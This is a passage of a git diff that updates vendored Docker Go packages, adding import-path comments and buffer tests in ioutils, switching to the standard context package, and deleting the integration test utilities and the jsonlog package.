MMDDhhmmYYYY - const timeLayout = "010203042006" - // Ensure we bring time back to now - now := time.Now().Format(timeLayout) - defer icmd.RunCommand("date", now) - - icmd.RunCommand("date", date.Format(timeLayout)) - block() - return -} diff --git a/vendor/github.com/docker/docker/pkg/integration/utils_test.go b/vendor/github.com/docker/docker/pkg/integration/utils_test.go deleted file mode 100644 index 0b2ef4aff5..0000000000 --- a/vendor/github.com/docker/docker/pkg/integration/utils_test.go +++ /dev/null @@ -1,363 +0,0 @@ -package integration - -import ( - "io" - "io/ioutil" - "os" - "os/exec" - "path/filepath" - "runtime" - "strings" - "testing" - "time" -) - -func TestIsKilledFalseWithNonKilledProcess(t *testing.T) { - var lsCmd *exec.Cmd - if runtime.GOOS != "windows" { - lsCmd = exec.Command("ls") - } else { - lsCmd = exec.Command("cmd", "/c", "dir") - } - - err := lsCmd.Run() - if IsKilled(err) { - t.Fatalf("Expected the ls command to not be killed, was.") - } -} - -func TestIsKilledTrueWithKilledProcess(t *testing.T) { - var longCmd *exec.Cmd - if runtime.GOOS != "windows" { - longCmd = exec.Command("top") - } else { - longCmd = exec.Command("powershell", "while ($true) { sleep 1 }") - } - - // Start a command - err := longCmd.Start() - if err != nil { - t.Fatal(err) - } - // Capture the error when *dying* - done := make(chan error, 1) - go func() { - done <- longCmd.Wait() - }() - // Then kill it - longCmd.Process.Kill() - // Get the error - err = <-done - if !IsKilled(err) { - t.Fatalf("Expected the command to be killed, was not.") - } -} - -func TestRunCommandPipelineWithOutputWithNotEnoughCmds(t *testing.T) { - _, _, err := RunCommandPipelineWithOutput(exec.Command("ls")) - expectedError := "pipeline does not have multiple cmds" - if err == nil || err.Error() != expectedError { - t.Fatalf("Expected an error with %s, got err:%s", expectedError, err) - } -} - -func TestRunCommandPipelineWithOutputErrors(t *testing.T) { - p := "$PATH" - if runtime.GOOS == 
"windows" { - p = "%PATH%" - } - cmd1 := exec.Command("ls") - cmd1.Stdout = os.Stdout - cmd2 := exec.Command("anything really") - _, _, err := RunCommandPipelineWithOutput(cmd1, cmd2) - if err == nil || err.Error() != "cannot set stdout pipe for anything really: exec: Stdout already set" { - t.Fatalf("Expected an error, got %v", err) - } - - cmdWithError := exec.Command("doesnotexists") - cmdCat := exec.Command("cat") - _, _, err = RunCommandPipelineWithOutput(cmdWithError, cmdCat) - if err == nil || err.Error() != `starting doesnotexists failed with error: exec: "doesnotexists": executable file not found in `+p { - t.Fatalf("Expected an error, got %v", err) - } -} - -func TestRunCommandPipelineWithOutput(t *testing.T) { - //TODO: Should run on Solaris - if runtime.GOOS == "solaris" { - t.Skip() - } - cmds := []*exec.Cmd{ - // Print 2 characters - exec.Command("echo", "-n", "11"), - // Count the number or char from stdin (previous command) - exec.Command("wc", "-m"), - } - out, exitCode, err := RunCommandPipelineWithOutput(cmds...) 
- expectedOutput := "2\n" - if out != expectedOutput || exitCode != 0 || err != nil { - t.Fatalf("Expected %s for commands %v, got out:%s, exitCode:%d, err:%v", expectedOutput, cmds, out, exitCode, err) - } -} - -func TestConvertSliceOfStringsToMap(t *testing.T) { - input := []string{"a", "b"} - actual := ConvertSliceOfStringsToMap(input) - for _, key := range input { - if _, ok := actual[key]; !ok { - t.Fatalf("Expected output to contains key %s, did not: %v", key, actual) - } - } -} - -func TestCompareDirectoryEntries(t *testing.T) { - tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-compare-directories") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpFolder) - - file1 := filepath.Join(tmpFolder, "file1") - file2 := filepath.Join(tmpFolder, "file2") - os.Create(file1) - os.Create(file2) - - fi1, err := os.Stat(file1) - if err != nil { - t.Fatal(err) - } - fi1bis, err := os.Stat(file1) - if err != nil { - t.Fatal(err) - } - fi2, err := os.Stat(file2) - if err != nil { - t.Fatal(err) - } - - cases := []struct { - e1 []os.FileInfo - e2 []os.FileInfo - shouldError bool - }{ - // Empty directories - { - []os.FileInfo{}, - []os.FileInfo{}, - false, - }, - // Same FileInfos - { - []os.FileInfo{fi1}, - []os.FileInfo{fi1}, - false, - }, - // Different FileInfos but same names - { - []os.FileInfo{fi1}, - []os.FileInfo{fi1bis}, - false, - }, - // Different FileInfos, different names - { - []os.FileInfo{fi1}, - []os.FileInfo{fi2}, - true, - }, - } - for _, elt := range cases { - err := CompareDirectoryEntries(elt.e1, elt.e2) - if elt.shouldError && err == nil { - t.Fatalf("Should have return an error, did not with %v and %v", elt.e1, elt.e2) - } - if !elt.shouldError && err != nil { - t.Fatalf("Should have not returned an error, but did : %v with %v and %v", err, elt.e1, elt.e2) - } - } -} - -// FIXME make an "unhappy path" test for ListTar without "panicking" :-) -func TestListTar(t *testing.T) { - // TODO Windows: Figure out why this fails. 
Should be portable. - if runtime.GOOS == "windows" { - t.Skip("Failing on Windows - needs further investigation") - } - tmpFolder, err := ioutil.TempDir("", "integration-cli-utils-list-tar") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpFolder) - - // Let's create a Tar file - srcFile := filepath.Join(tmpFolder, "src") - tarFile := filepath.Join(tmpFolder, "src.tar") - os.Create(srcFile) - cmd := exec.Command("sh", "-c", "tar cf "+tarFile+" "+srcFile) - _, err = cmd.CombinedOutput() - if err != nil { - t.Fatal(err) - } - - reader, err := os.Open(tarFile) - if err != nil { - t.Fatal(err) - } - defer reader.Close() - - entries, err := ListTar(reader) - if err != nil { - t.Fatal(err) - } - if len(entries) != 1 && entries[0] != "src" { - t.Fatalf("Expected a tar file with 1 entry (%s), got %v", srcFile, entries) - } -} - -func TestRandomTmpDirPath(t *testing.T) { - path := RandomTmpDirPath("something", runtime.GOOS) - - prefix := "/tmp/something" - if runtime.GOOS == "windows" { - prefix = os.Getenv("TEMP") + `\something` - } - expectedSize := len(prefix) + 11 - - if !strings.HasPrefix(path, prefix) { - t.Fatalf("Expected generated path to have '%s' as prefix, got %s'", prefix, path) - } - if len(path) != expectedSize { - t.Fatalf("Expected generated path to be %d, got %d", expectedSize, len(path)) - } -} - -func TestConsumeWithSpeed(t *testing.T) { - reader := strings.NewReader("1234567890") - chunksize := 2 - - bytes1, err := ConsumeWithSpeed(reader, chunksize, 1*time.Second, nil) - if err != nil { - t.Fatal(err) - } - - if bytes1 != 10 { - t.Fatalf("Expected to have read 10 bytes, got %d", bytes1) - } - -} - -func TestConsumeWithSpeedWithStop(t *testing.T) { - reader := strings.NewReader("1234567890") - chunksize := 2 - - stopIt := make(chan bool) - - go func() { - time.Sleep(1 * time.Millisecond) - stopIt <- true - }() - - bytes1, err := ConsumeWithSpeed(reader, chunksize, 20*time.Millisecond, stopIt) - if err != nil { - t.Fatal(err) - } - - if 
bytes1 != 2 { - t.Fatalf("Expected to have read 2 bytes, got %d", bytes1) - } - -} - -func TestParseCgroupPathsEmpty(t *testing.T) { - cgroupMap := ParseCgroupPaths("") - if len(cgroupMap) != 0 { - t.Fatalf("Expected an empty map, got %v", cgroupMap) - } - cgroupMap = ParseCgroupPaths("\n") - if len(cgroupMap) != 0 { - t.Fatalf("Expected an empty map, got %v", cgroupMap) - } - cgroupMap = ParseCgroupPaths("something:else\nagain:here") - if len(cgroupMap) != 0 { - t.Fatalf("Expected an empty map, got %v", cgroupMap) - } -} - -func TestParseCgroupPaths(t *testing.T) { - cgroupMap := ParseCgroupPaths("2:memory:/a\n1:cpuset:/b") - if len(cgroupMap) != 2 { - t.Fatalf("Expected a map with 2 entries, got %v", cgroupMap) - } - if value, ok := cgroupMap["memory"]; !ok || value != "/a" { - t.Fatalf("Expected cgroupMap to contains an entry for 'memory' with value '/a', got %v", cgroupMap) - } - if value, ok := cgroupMap["cpuset"]; !ok || value != "/b" { - t.Fatalf("Expected cgroupMap to contains an entry for 'cpuset' with value '/b', got %v", cgroupMap) - } -} - -func TestChannelBufferTimeout(t *testing.T) { - expected := "11" - - buf := &ChannelBuffer{make(chan []byte, 1)} - defer buf.Close() - - done := make(chan struct{}, 1) - go func() { - time.Sleep(100 * time.Millisecond) - io.Copy(buf, strings.NewReader(expected)) - done <- struct{}{} - }() - - // Wait long enough - b := make([]byte, 2) - _, err := buf.ReadTimeout(b, 50*time.Millisecond) - if err == nil && err.Error() != "timeout reading from channel" { - t.Fatalf("Expected an error, got %s", err) - } - <-done -} - -func TestChannelBuffer(t *testing.T) { - expected := "11" - - buf := &ChannelBuffer{make(chan []byte, 1)} - defer buf.Close() - - go func() { - time.Sleep(100 * time.Millisecond) - io.Copy(buf, strings.NewReader(expected)) - }() - - // Wait long enough - b := make([]byte, 2) - _, err := buf.ReadTimeout(b, 200*time.Millisecond) - if err != nil { - t.Fatal(err) - } - - if string(b) != expected { - 
t.Fatalf("Expected '%s', got '%s'", expected, string(b)) - } -} - -// FIXME doesn't work -// func TestRunAtDifferentDate(t *testing.T) { -// var date string - -// // Layout for date. MMDDhhmmYYYY -// const timeLayout = "20060102" -// expectedDate := "20100201" -// theDate, err := time.Parse(timeLayout, expectedDate) -// if err != nil { -// t.Fatal(err) -// } - -// RunAtDifferentDate(theDate, func() { -// cmd := exec.Command("date", "+%Y%M%d") -// out, err := cmd.Output() -// if err != nil { -// t.Fatal(err) -// } -// date = string(out) -// }) -// } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go index 3d737b3e19..466f79294b 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/buffer.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go index 41098fa6e7..b8887bfde0 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go @@ -1,10 +1,85 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "bytes" "testing" ) +func TestFixedBufferCap(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 5)} + + n := buf.Cap() + if n != 5 { + t.Fatalf("expected buffer capacity to be 5 bytes, got %d", n) + } +} + +func TestFixedBufferLen(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 10)} + + buf.Write([]byte("hello")) + l := buf.Len() + if l != 5 { + t.Fatalf("expected buffer length to be 5 bytes, got %d", l) + } + + buf.Write([]byte("world")) + l = buf.Len() + if l != 10 { + t.Fatalf("expected buffer length to be 10 bytes, got %d", l) + } + + // read 5 bytes + b := make([]byte, 5) + buf.Read(b) + + l = buf.Len() + if 
l != 5 { + t.Fatalf("expected buffer length to be 5 bytes, got %d", l) + } + + n, err := buf.Write([]byte("i-wont-fit")) + if n != 0 { + t.Fatalf("expected no bytes to be written to buffer, got %d", n) + } + if err != errBufferFull { + t.Fatalf("expected errBufferFull, got %v", err) + } + + l = buf.Len() + if l != 5 { + t.Fatalf("expected buffer length to still be 5 bytes, got %d", l) + } + + buf.Reset() + l = buf.Len() + if l != 0 { + t.Fatalf("expected buffer length to still be 0 bytes, got %d", l) + } +} + +func TestFixedBufferString(t *testing.T) { + buf := &fixedBuffer{buf: make([]byte, 0, 10)} + + buf.Write([]byte("hello")) + buf.Write([]byte("world")) + + out := buf.String() + if out != "helloworld" { + t.Fatalf("expected output to be \"helloworld\", got %q", out) + } + + // read 5 bytes + b := make([]byte, 5) + buf.Read(b) + + // test that fixedBuffer.String() only returns the part that hasn't been read + out = buf.String() + if out != "world" { + t.Fatalf("expected output to be \"world\", got %q", out) + } +} + func TestFixedBufferWrite(t *testing.T) { buf := &fixedBuffer{buf: make([]byte, 0, 64)} n, err := buf.Write([]byte("hello")) @@ -21,6 +96,9 @@ func TestFixedBufferWrite(t *testing.T) { } n, err = buf.Write(bytes.Repeat([]byte{1}, 64)) + if n != 59 { + t.Fatalf("expected 59 bytes written before buffer is full, got %d", n) + } if err != errBufferFull { t.Fatalf("expected errBufferFull, got %v - %v", err, buf.buf[:64]) } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go index 72a04f3491..d4bbf3c9dc 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go 
b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go index 300fb5f6d5..9101f20a21 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "crypto/sha1" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt.go deleted file mode 100644 index 0b04b0ba3e..0000000000 --- a/vendor/github.com/docker/docker/pkg/ioutils/fmt.go +++ /dev/null @@ -1,22 +0,0 @@ -package ioutils - -import ( - "fmt" - "io" -) - -// FprintfIfNotEmpty prints the string value if it's not empty -func FprintfIfNotEmpty(w io.Writer, format, value string) (int, error) { - if value != "" { - return fmt.Fprintf(w, format, value) - } - return 0, nil -} - -// FprintfIfTrue prints the boolean value if it's true -func FprintfIfTrue(w io.Writer, format string, ok bool) (int, error) { - if ok { - return fmt.Fprintf(w, format, ok) - } - return 0, nil -} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go deleted file mode 100644 index 8968863296..0000000000 --- a/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go +++ /dev/null @@ -1,17 +0,0 @@ -package ioutils - -import "testing" - -func TestFprintfIfNotEmpty(t *testing.T) { - wc := NewWriteCounter(&NopWriter{}) - n, _ := FprintfIfNotEmpty(wc, "foo%s", "") - - if wc.Count != 0 || n != 0 { - t.Errorf("Wrong count: %v vs. %v vs. 0", wc.Count, n) - } - - n, _ = FprintfIfNotEmpty(wc, "foo%s", "bar") - if wc.Count != 6 || n != 6 { - t.Errorf("Wrong count: %v vs. %v vs. 
6", wc.Count, n) - } -} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go index a56c462651..534d66ac26 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go index c4d1419306..b283045de5 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "bytes" @@ -37,7 +37,7 @@ func TestAtomicWriteToFile(t *testing.T) { t.Fatalf("Error reading from file: %v", err) } - if bytes.Compare(actual, expected) != 0 { + if !bytes.Equal(actual, expected) { t.Fatalf("Data mismatch, expected %q, got %q", expected, actual) } @@ -85,7 +85,7 @@ func TestAtomicWriteSetCommit(t *testing.T) { t.Fatalf("Error reading from file: %v", err) } - if bytes.Compare(actual, expected) != 0 { + if !bytes.Equal(actual, expected) { t.Fatalf("Data mismatch, expected %q, got %q", expected, actual) } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers.go b/vendor/github.com/docker/docker/pkg/ioutils/readers.go index 63f3c07f46..1f657bd3dc 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/readers.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/readers.go @@ -1,25 +1,28 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( + "context" "crypto/sha256" "encoding/hex" "io" - - "golang.org/x/net/context" ) -type readCloserWrapper struct { +// ReadCloserWrapper wraps an io.Reader, and implements an io.ReadCloser +// It calls the given callback function when 
closed. It should be constructed +// with NewReadCloserWrapper +type ReadCloserWrapper struct { io.Reader closer func() error } -func (r *readCloserWrapper) Close() error { +// Close calls back the passed closer function +func (r *ReadCloserWrapper) Close() error { return r.closer() } // NewReadCloserWrapper returns a new io.ReadCloser. func NewReadCloserWrapper(r io.Reader, closer func() error) io.ReadCloser { - return &readCloserWrapper{ + return &ReadCloserWrapper{ Reader: r, closer: closer, } diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go index 9abc1054df..e645c78d83 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go @@ -1,20 +1,22 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( + "context" "fmt" "io/ioutil" "strings" "testing" "time" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // Implement io.Reader type errorReader struct{} func (r *errorReader) Read(p []byte) (int, error) { - return 0, fmt.Errorf("Error reader always fail.") + return 0, fmt.Errorf("error reader always fail") } func TestReadCloserWrapperClose(t *testing.T) { @@ -35,9 +37,7 @@ func TestReaderErrWrapperReadOnError(t *testing.T) { called = true }) _, err := wrapper.Read([]byte{}) - if err == nil || !strings.Contains(err.Error(), "Error reader always fail.") { - t.Fatalf("readErrWrapper should returned an error") - } + assert.Check(t, is.Error(err, "error reader always fail")) if !called { t.Fatalf("readErrWrapper should have call the anonymous function on failure") } @@ -80,7 +80,8 @@ func (p *perpetualReader) Read(buf []byte) (n int, err error) { } func TestCancelReadCloser(t *testing.T) { - ctx, _ := context.WithTimeout(context.Background(), 100*time.Millisecond) + ctx, cancel := context.WithTimeout(context.Background(), 
100*time.Millisecond) + defer cancel() cancelReadCloser := NewCancelReadCloser(ctx, ioutil.NopCloser(&perpetualReader{})) for { var buf [128]byte diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go index 1539ad21b5..dc894f9131 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go @@ -1,6 +1,6 @@ // +build !windows -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go index c258e5fdd8..ecaba2e36d 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go index 52a4901ade..91b8d18266 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers.go b/vendor/github.com/docker/docker/pkg/ioutils/writers.go index ccc7f9c23e..61c679497d 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/writers.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/writers.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import "io" diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go index 564b1cd4f5..94d446f9a9 100644 
--- a/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go +++ b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go @@ -1,4 +1,4 @@ -package ioutils +package ioutils // import "github.com/docker/docker/pkg/ioutils" import ( "bytes" diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go deleted file mode 100644 index 4734c31119..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go +++ /dev/null @@ -1,42 +0,0 @@ -package jsonlog - -import ( - "encoding/json" - "fmt" - "time" -) - -// JSONLog represents a log message, typically a single entry from a given log stream. -// JSONLogs can be easily serialized to and from JSON and support custom formatting. -type JSONLog struct { - // Log is the log message - Log string `json:"log,omitempty"` - // Stream is the log source - Stream string `json:"stream,omitempty"` - // Created is the created timestamp of log - Created time.Time `json:"time"` - // Attrs is the list of extra attributes provided by the user - Attrs map[string]string `json:"attrs,omitempty"` -} - -// Format returns the log formatted according to format -// If format is nil, returns the log message -// If format is json, returns the log marshaled in json format -// By default, returns the log with the log time formatted according to format. -func (jl *JSONLog) Format(format string) (string, error) { - if format == "" { - return jl.Log, nil - } - if format == "json" { - m, err := json.Marshal(jl) - return string(m), err - } - return fmt.Sprintf("%s %s", jl.Created.Format(format), jl.Log), nil -} - -// Reset resets the log to nil. 
-func (jl *JSONLog) Reset() { - jl.Log = "" - jl.Stream = "" - jl.Created = time.Time{} -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go deleted file mode 100644 index 83ce684a8e..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go +++ /dev/null @@ -1,178 +0,0 @@ -// This code was initially generated by ffjson -// This code was generated via the following steps: -// $ go get -u github.com/pquerna/ffjson -// $ make BIND_DIR=. shell -// $ ffjson pkg/jsonlog/jsonlog.go -// $ mv pkg/jsonglog/jsonlog_ffjson.go pkg/jsonlog/jsonlog_marshalling.go -// -// It has been modified to improve the performance of time marshalling to JSON -// and to clean it up. -// Should this code need to be regenerated when the JSONLog struct is changed, -// the relevant changes which have been made are: -// import ( -// "bytes" -//- -// "unicode/utf8" -// ) -// -// func (mj *JSONLog) MarshalJSON() ([]byte, error) { -//@@ -20,13 +16,13 @@ func (mj *JSONLog) MarshalJSON() ([]byte, error) { -// } -// return buf.Bytes(), nil -// } -//+ -// func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { -//- var err error -//- var obj []byte -//- var first bool = true -//- _ = obj -//- _ = err -//- _ = first -//+ var ( -//+ err error -//+ timestamp string -//+ first bool = true -//+ ) -// buf.WriteString(`{`) -// if len(mj.Log) != 0 { -// if first == true { -//@@ -52,11 +48,11 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { -// buf.WriteString(`,`) -// } -// buf.WriteString(`"time":`) -//- obj, err = mj.Created.MarshalJSON() -//+ timestamp, err = FastTimeMarshalJSON(mj.Created) -// if err != nil { -// return err -// } -//- buf.Write(obj) -//+ buf.WriteString(timestamp) -// buf.WriteString(`}`) -// return nil -// } -// @@ -81,9 +81,10 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { -// if len(mj.Log) != 0 { -// - if first == true { -// - 
first = false -// - } else { -// - buf.WriteString(`,`) -// - } -// + first = false -// buf.WriteString(`"log":`) -// ffjsonWriteJSONString(buf, mj.Log) -// } - -package jsonlog - -import ( - "bytes" - "unicode/utf8" -) - -// MarshalJSON marshals the JSONLog. -func (mj *JSONLog) MarshalJSON() ([]byte, error) { - var buf bytes.Buffer - buf.Grow(1024) - if err := mj.MarshalJSONBuf(&buf); err != nil { - return nil, err - } - return buf.Bytes(), nil -} - -// MarshalJSONBuf marshals the JSONLog and stores the result to a bytes.Buffer. -func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { - var ( - err error - timestamp string - first = true - ) - buf.WriteString(`{`) - if len(mj.Log) != 0 { - first = false - buf.WriteString(`"log":`) - ffjsonWriteJSONString(buf, mj.Log) - } - if len(mj.Stream) != 0 { - if first { - first = false - } else { - buf.WriteString(`,`) - } - buf.WriteString(`"stream":`) - ffjsonWriteJSONString(buf, mj.Stream) - } - if !first { - buf.WriteString(`,`) - } - buf.WriteString(`"time":`) - timestamp, err = FastTimeMarshalJSON(mj.Created) - if err != nil { - return err - } - buf.WriteString(timestamp) - buf.WriteString(`}`) - return nil -} - -func ffjsonWriteJSONString(buf *bytes.Buffer, s string) { - const hex = "0123456789abcdef" - - buf.WriteByte('"') - start := 0 - for i := 0; i < len(s); { - if b := s[i]; b < utf8.RuneSelf { - if 0x20 <= b && b != '\\' && b != '"' && b != '<' && b != '>' && b != '&' { - i++ - continue - } - if start < i { - buf.WriteString(s[start:i]) - } - switch b { - case '\\', '"': - buf.WriteByte('\\') - buf.WriteByte(b) - case '\n': - buf.WriteByte('\\') - buf.WriteByte('n') - case '\r': - buf.WriteByte('\\') - buf.WriteByte('r') - default: - - buf.WriteString(`\u00`) - buf.WriteByte(hex[b>>4]) - buf.WriteByte(hex[b&0xF]) - } - i++ - start = i - continue - } - c, size := utf8.DecodeRuneInString(s[i:]) - if c == utf8.RuneError && size == 1 { - if start < i { - buf.WriteString(s[start:i]) - } - 
buf.WriteString(`\ufffd`) - i += size - start = i - continue - } - - if c == '\u2028' || c == '\u2029' { - if start < i { - buf.WriteString(s[start:i]) - } - buf.WriteString(`\u202`) - buf.WriteByte(hex[c&0xF]) - i += size - start = i - continue - } - i += size - } - if start < len(s) { - buf.WriteString(s[start:]) - } - buf.WriteByte('"') -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go deleted file mode 100644 index 3edb271410..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go +++ /dev/null @@ -1,34 +0,0 @@ -package jsonlog - -import ( - "regexp" - "testing" -) - -func TestJSONLogMarshalJSON(t *testing.T) { - logs := map[*JSONLog]string{ - &JSONLog{Log: `"A log line with \\"`}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: "A log line"}: `^{\"log\":\"A log line\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: "A log line with \r"}: `^{\"log\":\"A log line with \\r\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: "A log line with & < >"}: `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: "A log line with utf8 : 🚀 ψ ω β"}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":\".{20,}\"}$`, - &JSONLog{Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":\".{20,}\"}$`, - &JSONLog{}: `^{\"time\":\".{20,}\"}$`, - // These ones are a little weird - &JSONLog{Log: "\u2028 \u2029"}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: string([]byte{0xaF})}: `^{\"log\":\"\\ufffd\",\"time\":\".{20,}\"}$`, - &JSONLog{Log: string([]byte{0x7F})}: `^{\"log\":\"\x7f\",\"time\":\".{20,}\"}$`, - } - for jsonLog, expression := range logs { - data, err := jsonLog.MarshalJSON() - if err != nil { - t.Fatal(err) - } - res := string(data) - t.Logf("Result of WriteLog: %q", res) - logRe := regexp.MustCompile(expression) - if !logRe.MatchString(res) 
{ - t.Fatalf("Log line not in expected format [%v]: %q", expression, res) - } - } -} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go deleted file mode 100644 index 6d6ad21583..0000000000 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go +++ /dev/null @@ -1,39 +0,0 @@ -package jsonlog - -import ( - "bytes" - "regexp" - "testing" -) - -func TestJSONLogsMarshalJSONBuf(t *testing.T) { - logs := map[*JSONLogs]string{ - &JSONLogs{Log: []byte(`"A log line with \\"`)}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":}$`, - &JSONLogs{Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"time\":}$`, - &JSONLogs{Log: []byte("A log line with \r")}: `^{\"log\":\"A log line with \\r\",\"time\":}$`, - &JSONLogs{Log: []byte("A log line with & < >")}: `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":}$`, - &JSONLogs{Log: []byte("A log line with utf8 : 🚀 ψ ω β")}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":}$`, - &JSONLogs{Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":}$`, - &JSONLogs{Stream: "stdout", Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"stream\":\"stdout\",\"time\":}$`, - &JSONLogs{Created: "time"}: `^{\"time\":time}$`, - &JSONLogs{}: `^{\"time\":}$`, - // These ones are a little weird - &JSONLogs{Log: []byte("\u2028 \u2029")}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":}$`, - &JSONLogs{Log: []byte{0xaF}}: `^{\"log\":\"\\ufffd\",\"time\":}$`, - &JSONLogs{Log: []byte{0x7F}}: `^{\"log\":\"\x7f\",\"time\":}$`, - // with raw attributes - &JSONLogs{Log: []byte("A log line"), RawAttrs: 